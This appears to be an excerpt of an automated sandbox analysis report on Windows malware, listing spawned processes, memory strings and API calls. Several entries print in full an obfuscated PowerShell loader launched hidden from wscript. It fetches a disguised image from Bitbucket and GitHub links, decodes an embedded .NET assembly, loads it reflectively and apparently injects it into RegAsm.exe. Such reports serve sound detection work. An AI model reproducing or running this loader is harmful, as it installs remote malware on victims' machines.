M#eQBz#HQ#ZQBt#C4#V#Bl#Hg#d##u#EU#bgBj#G8#Z#Bp#G4#ZwBd#Do#OgBV#FQ#Rg#4#C4#RwBl#HQ#UwB0#HI#aQBu#Gc#K##k#Gk#bQBh#Gc#ZQBC#Hk#d#Bl#HM#KQ#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBT#FQ#QQBS#FQ#Pg#+#Cc#Ow#g#CQ#ZQBu#GQ#RgBs#GE#Zw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#EU#TgBE#D4#Pg#n#Ds#I##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##9#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##u#Ek#bgBk#GU#e#BP#GY#K##k#HM#d#Bh#HI#d#BG#Gw#YQBn#Ck#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#GU#bgBk#Ek#bgBk#GU#e##g#D0#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#ZQBu#GQ#RgBs#GE#Zw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##aQBm#C##K##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##t#Gc#ZQ#g#D##I##t#GE#bgBk#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#Gc#d##g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##p#C##ew#g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#Cs#PQ#g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#LgBM#GU#bgBn#HQ#a##7#C##DQ#K#C##I##g#CJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/adssgfdsg/testing/downloads/img_test.jpg?144417', 'https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.drmmpgk/niam/sdaeh/sfer/bpayks/AKISEAWUEJI/moc.tnetnocresubuhtig.war//:sptth', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -execJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$codigo = 'wwbo#gu#d##u#fm#zqby#hy#aqbj#gu#u#bv#gk#bgb0#e0#yqbu#ge#zwbl#hi#xq#6#do#uwbl#gm#dqby#gk#d#b5#f##cgbv#hq#bwbj#g8#b##g#d0#i#bb#e4#zqb0#c4#uwbl#gm#dqby#gk#d#b5#f##cgbv#hq#bwbj#g8#b#bu#hk#c#bl#f0#og#6#fq#b#bz#de#mg#n##o#i##g#c##i##g#c##i##g#c##i##g#c##zgb1#g4#ywb0#gk#bwbu#c##r#bv#hc#bgbs#g8#yqbk#eq#yqb0#ge#rgby#g8#bqbm#gk#bgbr#hm#i#b7#c##c#bh#hi#yqbt#c##k#bb#hm#d#by#gk#bgbn#fs#xqbd#cq#b#bp#g4#awbz#ck#i##n##o#i##g#c##i##g#c##i##g#c##i##g#c##j#b3#gu#ygbd#gw#aqbl#g4#d##g#d0#i#bo#gu#dw#t#e8#ygbq#gu#ywb0#c##uwb5#hm#d#bl#g0#lgbo#gu#d##u#fc#zqbi#em#b#bp#gu#bgb0#ds#i##n##o#i##g#c##i##g#c##i##g#c##i##g#c##j#bz#gg#dqbm#gy#b#bl#gq#t#bp#g4#awbz#c##pq#g#ec#zqb0#c0#ugbh#g4#z#bv#g0#i##t#ek#bgbw#hu#d#bp#gi#agbl#gm#d##g#cq#b#bp#g4#awbz#c##lqbd#g8#dqbu#hq#i##k#gw#aqbu#gs#cw#u#ew#zqbu#gc#d#bo#ds#i##n##o#i##g#c##i##g#c##i##g#c##i##g#c##zgbv#hi#zqbh#gm#a##g#cg#j#bs#gk#bgbr#c##aqbu#c##j#bz#gg#dqbm#gy#b#bl#gq#t#bp#g4#awbz#ck#i#b7#c##d#by#hk#i#b7#c##cgbl#hq#dqby#g4#i##k#hc#zqbi#em#b#bp#gu#bgb0#c4#r#bv#hc#bgbs#g8#yqbk#eq#yqb0#ge#k##k#gw#aqbu#gs#kq#g#h0#i#bj#ge#d#bj#gg#i#b7#c##ywbv#g4#d#bp#g4#dqbl#c##fq#g#h0#ow#g##0#cg#g#c##i##g#c##i##g#c##i##g#c##i#by#gu#d#b1#hi#bg#g#cq#bgb1#gw#b##g#h0#ow#g##0#cg#g#c##i##g#c##i##g#c##i##g#c##i##k#gw#aqbu#gs#cw#g#d0#i#b##cg#jwbo#hq#d#bw#hm#og#v#c8#ygbp#hq#ygb1#gm#awbl#hq#lgbv#hi#zw#v#ge#z#bz#hm#zwbm#gq#cwbn#c8#d#bl#hm#d#bp#g4#zw#v#gq#bwb3#g4#b#bv#ge#z#bz#c8#aqbt#gc#xwb0#gu#cwb0#c4#agbw#gc#pw#x#dq#n##0#de#nw#n#cw#i##n#gg#d#b0#h##cw#6#c8#lwby#ge#dw#u#gc#aqb0#gg#dqbi#hu#cwbl#hi#ywbv#g4#d#bl#g4#d##u#gm#bwbt#c8#cwbh#g4#d#bv#g0#yqbs#g8#lwbh#hu#z#bp#hq#lwbt#ge#aqbu#c8#aqbt#gc#xwb0#gu#cwb0#c4#agbw#gc#pw#x#dq#n##0#de#nw#y#dm#jw#p#ds#dq#k#c##i##g#c##i##g#c##i##g#c##i##g#c##j#bp#g0#yqbn#gu#qgb5#hq#zqbz#c##pq#g#eq#bwb3#g4#b#bv#ge#z#be#ge#d#bh#ey#cgbv#g0#t#bp#g4#awbz#c##j#bs#gk#bgbr#hm#ow#n##o#i##g#c##i##g#c##i##g#c##i##g#c##i#bp#gy#i##o#cq#aqbt#ge#zwbl#ei#eqb0#gu#cw#g#c0#bgbl#c##j#bu#hu#b#bs#ck#i#b7#c##j#bp#g0#yqbn#gu#v#bl#hg#d##g#d0#i#bb#fm#eqbz#hq#zqbt#c4#v#bl#hg#d##u#eu#bgbj#g8#z#bp#g4#zwbd#do#ogbv#fq#rg#4#c4#rwbl#hq#uwb0#hi#aqbu#gc#k##k#gk#bqbh#gc#zqbc#hk#d#bl#hm#kq#7##0#cg#g#c##i##g#c##i##g#c##i##g#c##i##g#cq#cwb0#ge#cgb0#ey#b#bh#gc#i##9#c##jw#8#dw#qgbb#fm#rq#2#dq#xwbt#fq#qqbs#fq#pg#+#cc#ow#g#cq#zqbu#gq#rgbs#ge#zw#g#d0#i##n#dw#p#bc#ee#uwbf#dy#n#bf#eu#tgbe#d4#pg#n#ds#i##k#hm#d#bh#hi#d#bj#g4#z#bl#hg#i##9#c##j#bp#g0#yqbn#gu#v#bl#hg#d##u#ek#bgbk#gu#e#bp#gy#k##k#hm#d#bh#hi#d#bg#gw#yqbn#ck#ow#g##0#cg#g#c##i##g#c##i##g#c##i##g#c##i##k#gu#bgbk#ek#bgbk#gu#e##g#d0#i##k#gk#bqbh#gc#zqbu#gu#e#b0#c4#sqbu#gq#zqb4#e8#zg#o#cq#zqbu#gq#rgbs#ge#zw#p#ds#dq#k#c##i##g#c##i##g#c##i##g#c##i##g#c##aqbm#c##k##k#hm#d#bh#hi#d#bj#g4#z#bl#hg#i##t#gc#zq#g#d##i##t#ge#bgbk#c##j#bl#g4#z#bj#g4#z#bl#hg#i##t#gc#d##g#cq#cwb0#ge#cgb0#ek#bgbk#gu#e##p#c##ew#g#cq#cwb0#ge#cgb0#ek#bgbk#gu#e##g#cs#pq#g#cq#cwb0#ge#cgb0#ey#b#bh#gc#lgbm#gu#bgbn#hq#a##7#c##dq#k#c##i##g#c
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "[net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12 function downloaddatafromlinks { param ([string[]]$links) $webclient = new-object system.net.webclient; $shuffledlinks = get-random -inputobject $links -count $links.length; foreach ($link in $shuffledlinks) { try { return $webclient.downloaddata($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/adssgfdsg/testing/downloads/img_test.jpg?144417', 'https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?14441723'); $imagebytes = downloaddatafromlinks $links; if ($imagebytes -ne $null) { $imagetext = [system.text.encoding]::utf8.getstring($imagebytes); $startflag = '<<base64_start>>'; $endflag = '<<base64_end>>'; $startindex = $imagetext.indexof($startflag); $endindex = $imagetext.indexof($endflag); if ($startindex -ge 0 -and $endindex -gt $startindex) { $startindex += $startflag.length; $base64length = $endindex - $startindex; $base64command = $imagetext.substring($startindex, $base64length); $commandbytes = [system.convert]::frombase64string($base64command); $loadedassembly = [system.reflection.assembly]::load($commandbytes); $type = $loadedassembly.gettype('testpowershell.home'); $method = $type.getmethod('la').invoke($null, [object[]] ('txt.drmmpgk/niam/sdaeh/sfer/bpayks/akiseawueji/moc.tnetnocresubuhtig.war//:sptth', '0', 'startupname', 'regasm', '0'))}}" .exe -windowstyle hidden -exec
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$codigo = 'wwbo#gu#d##u#fm#zqby#hy#aqbj#gu#u#bv#gk#bgb0#e0#yqbu#ge#zwbl#hi#xq#6#do#uwbl#gm#dqby#gk#d#b5#f##cgbv#hq#bwbj#g8#b##g#d0#i#bb#e4#zqb0#c4#uwbl#gm#dqby#gk#d#b5#f##cgbv#hq#bwbj#g8#b#bu#hk#c#bl#f0#og#6#fq#b#bz#de#mg#n##o#i##g#c##i##g#c##i##g#c##i##g#c##zgb1#g4#ywb0#gk#bwbu#c##r#bv#hc#bgbs#g8#yqbk#eq#yqb0#ge#rgby#g8#bqbm#gk#bgbr#hm#i#b7#c##c#bh#hi#yqbt#c##k#bb#hm#d#by#gk#bgbn#fs#xqbd#cq#b#bp#g4#awbz#ck#i##n##o#i##g#c##i##g#c##i##g#c##i##g#c##j#b3#gu#ygbd#gw#aqbl#g4#d##g#d0#i#bo#gu#dw#t#e8#ygbq#gu#ywb0#c##uwb5#hm#d#bl#g0#lgbo#gu#d##u#fc#zqbi#em#b#bp#gu#bgb0#ds#i##n##o#i##g#c##i##g#c##i##g#c##i##g#c##j#bz#gg#dqbm#gy#b#bl#gq#t#bp#g4#awbz#c##pq#g#ec#zqb0#c0#ugbh#g4#z#bv#g0#i##t#ek#bgbw#hu#d#bp#gi#agbl#gm#d##g#cq#b#bp#g4#awbz#c##lqbd#g8#dqbu#hq#i##k#gw#aqbu#gs#cw#u#ew#zqbu#gc#d#bo#ds#i##n##o#i##g#c##i##g#c##i##g#c##i##g#c##zgbv#hi#zqbh#gm#a##g#cg#j#bs#gk#bgbr#c##aqbu#c##j#bz#gg#dqbm#gy#b#bl#gq#t#bp#g4#awbz#ck#i#b7#c##d#by#hk#i#b7#c##cgbl#hq#dqby#g4#i##k#hc#zqbi#em#b#bp#gu#bgb0#c4#r#bv#hc#bgbs#g8#yqbk#eq#yqb0#ge#k##k#gw#aqbu#gs#kq#g#h0#i#bj#ge#d#bj#gg#i#b7#c##ywbv#g4#d#bp#g4#dqbl#c##fq#g#h0#ow#g##0#cg#g#c##i##g#c##i##g#c##i##g#c##i#by#gu#d#b1#hi#bg#g#cq#bgb1#gw#b##g#h0#ow#g##0#cg#g#c##i##g#c##i##g#c##i##g#c##i##k#gw#aqbu#gs#cw#g#d0#i#b##cg#jwbo#hq#d#bw#hm#og#v#c8#ygbp#hq#ygb1#gm#awbl#hq#lgbv#hi#zw#v#ge#z#bz#hm#zwbm#gq#cwbn#c8#d#bl#hm#d#bp#g4#zw#v#gq#bwb3#g4#b#bv#ge#z#bz#c8#aqbt#gc#xwb0#gu#cwb0#c4#agbw#gc#pw#x#dq#n##0#de#nw#n#cw#i##n#gg#d#b0#h##cw#6#c8#lwby#ge#dw#u#gc#aqb0#gg#dqbi#hu#cwbl#hi#ywbv#g4#d#bl#g4#d##u#gm#bwbt#c8#cwbh#g4#d#bv#g0#yqbs#g8#lwbh#hu#z#bp#hq#lwbt#ge#aqbu#c8#aqbt#gc#xwb0#gu#cwb0#c4#agbw#gc#pw#x#dq#n##0#de#nw#y#dm#jw#p#ds#dq#k#c##i##g#c##i##g#c##i##g#c##i##g#c##j#bp#g0#yqbn#gu#qgb5#hq#zqbz#c##pq#g#eq#bwb3#g4#b#bv#ge#z#be#ge#d#bh#ey#cgbv#g0#t#bp#g4#awbz#c##j#bs#gk#bgbr#hm#ow#n##o#i##g#c##i##g#c##i##g#c##i##g#c##i#bp#gy#i##o#cq#aqbt#ge#zwbl#ei#eqb0#gu#cw#g#c0#bgbl#c##j#bu#hu#b#bs#ck#i#b7#c##j#bp#g0#yqbn#gu#v#bl#hg#d##g#d0#i#bb#fm#eqbz#hq#zqbt#c4#v#bl#hg#d##u#eu#bgbj#g8#z#bp#g4#zwbd#do#ogbv#fq#rg#4#c4#rwbl#hq#uwb0#hi#aqbu#gc#k##k#gk#bqbh#gc#zqbc#hk#d#bl#hm#kq#7##0#cg#g#c##i##g#c##i##g#c##i##g#c##i##g#cq#cwb0#ge#cgb0#ey#b#bh#gc#i##9#c##jw#8#dw#qgbb#fm#rq#2#dq#xwbt#fq#qqbs#fq#pg#+#cc#ow#g#cq#zqbu#gq#rgbs#ge#zw#g#d0#i##n#dw#p#bc#ee#uwbf#dy#n#bf#eu#tgbe#d4#pg#n#ds#i##k#hm#d#bh#hi#d#bj#g4#z#bl#hg#i##9#c##j#bp#g0#yqbn#gu#v#bl#hg#d##u#ek#bgbk#gu#e#bp#gy#k##k#hm#d#bh#hi#d#bg#gw#yqbn#ck#ow#g##0#cg#g#c##i##g#c##i##g#c##i##g#c##i##k#gu#bgbk#ek#bgbk#gu#e##g#d0#i##k#gk#bqbh#gc#zqbu#gu#e#b0#c4#sqbu#gq#zqb4#e8#zg#o#cq#zqbu#gq#rgbs#ge#zw#p#ds#dq#k#c##i##g#c##i##g#c##i##g#c##i##g#c##aqbm#c##k##k#hm#d#bh#hi#d#bj#g4#z#bl#hg#i##t#gc#zq#g#d##i##t#ge#bgbk#c##j#bl#g4#z#bj#g4#z#bl#hg#i##t#gc#d##g#cq#cwb0#ge#cgb0#ek#bgbk#gu#e##p#c##ew#g#cq#cwb0#ge#cgb0#ek#bgbk#gu#e##g#cs#pq#g#cq#cwb0#ge#cgb0#ey#b#bh#gc#lgbm#gu#bgbn#hq#a##7#c##dq#k#c##i##g#cJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "[net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12 function downloaddatafromlinks { param ([string[]]$links) $webclient = new-object system.net.webclient; $shuffledlinks = get-random -inputobject $links -count $links.length; foreach ($link in $shuffledlinks) { try { return $webclient.downloaddata($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/adssgfdsg/testing/downloads/img_test.jpg?144417', 'https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?14441723'); $imagebytes = downloaddatafromlinks $links; if ($imagebytes -ne $null) { $imagetext = [system.text.encoding]::utf8.getstring($imagebytes); $startflag = '<<base64_start>>'; $endflag = '<<base64_end>>'; $startindex = $imagetext.indexof($startflag); $endindex = $imagetext.indexof($endflag); if ($startindex -ge 0 -and $endindex -gt $startindex) { $startindex += $startflag.length; $base64length = $endindex - $startindex; $base64command = $imagetext.substring($startindex, $base64length); $commandbytes = [system.convert]::frombase64string($base64command); $loadedassembly = [system.reflection.assembly]::load($commandbytes); $type = $loadedassembly.gettype('testpowershell.home'); $method = $type.getmethod('la').invoke($null, [object[]] ('txt.drmmpgk/niam/sdaeh/sfer/bpayks/akiseawueji/moc.tnetnocresubuhtig.war//:sptth', '0', 'startupname', 'regasm', '0'))}}" .exe -windowstyle hidden -execJump to behavior
              Source: RegAsm.exe, 00000008.00000002.3509300667.0000000000E0A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
              Source: RegAsm.exe, 00000008.00000002.3509300667.0000000000E0A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerN
              Source: RegAsm.exe, 00000008.00000002.3509300667.0000000000E0A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000008.00000002.3509300667.0000000000DFB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0042C3C6 cpuid 8_2_0042C3C6
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoA,8_2_0040A7D3
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,8_2_00444161
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,8_2_004441AC
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,8_2_00444247
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,8_2_004442D4
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,8_2_0043D32C
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,8_2_00444524
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,8_2_0044464D
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,8_2_00444754
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,8_2_00444821
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,8_2_0043CEC5
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,8_2_00443EE9
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
